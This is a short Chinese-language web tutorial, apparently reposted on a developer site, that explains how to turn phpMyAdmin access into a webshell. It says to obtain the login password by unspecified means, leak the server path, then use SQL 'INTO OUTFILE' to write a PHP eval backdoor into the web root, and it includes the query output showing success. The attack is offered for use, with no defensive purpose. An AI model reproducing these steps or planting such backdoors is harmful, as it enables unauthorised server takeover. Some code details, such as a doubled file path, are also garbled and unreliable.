当前位置: 代码网 > 服务器>网络安全>企业安全 > 教你phpMyAdmin 后台拿webshell

教你phpMyAdmin 后台拿webshell

2008年10月08日 企业安全 我要评论
教你phpMyAdmin 后台拿webshell 1.如何拿到登陆密码,自己想办法。2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.3.选择一个Database.运行以下语句.----start code---Cre... 08-10-08

1.如何拿到登陆密码,自己想办法。
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个database.运行以下语句.
----start code---
create table a (cmd text not null);
insert into a (cmd) values('<?php eval($_post[1]);?>');
select cmd from a into outfile 'f:/program files/apache group/apache2/htdocs/phpmyadmin/d.php/d.php';
drop table if exists a;
----end code---
4.如果没什么意外.对应网站得到webshell

您运行的 sql 语句已经成功运行了。
sql 查询:
create table a(
cmd text not null
);# mysql 返回的查询结果为空(即零行)。
insert into a( cmd )
values (
'<?php eval($_post[1]);?>'
);# 影响列数: 1
select cmd
from a
into outfile 'f:/program files/apache group/apache2/htdocs/phpmyadmin/d.php';# 影响列数: 1
drop table if exists a;# mysql 返回的查询结果为空(即零行)。


(0)

相关文章:

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论

验证码:
最近更新的文章
推荐阅读
大家感兴趣的文章
Copyright © 2017-2025  代码网 保留所有权利. 粤ICP备2024248653号
站长QQ:2386932994 | 联系邮箱:2386932994@qq.com